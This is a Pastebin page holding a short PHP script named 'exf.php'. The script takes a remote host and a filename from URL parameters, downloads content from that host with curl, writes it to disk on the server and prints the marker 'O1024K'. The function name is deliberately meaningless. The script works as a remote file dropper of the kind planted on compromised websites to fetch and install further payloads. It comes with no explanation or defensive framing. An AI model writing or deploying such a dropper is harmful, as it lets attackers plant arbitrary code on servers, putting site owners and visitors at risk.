Advertisement
PalmaSolutions

exf.php

Apr 19th, 2019
326
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.33 KB | None | 0 0
  1. <?php
  2. function class_x_i($x = ''){
  3. $urlset = isset($_GET['name']) ? trim($_GET['name']) : '';
  4. $filename = isset($_GET['file']) ? trim($_GET['file']) : '';
  5. $ch = curl_init('http://'.$urlset);
  6. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  7. $result = curl_exec($ch);
  8. file_put_contents($filename,$result);
  9. echo 'O1024K';
  10. }
  11. class_x_i();
  12. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement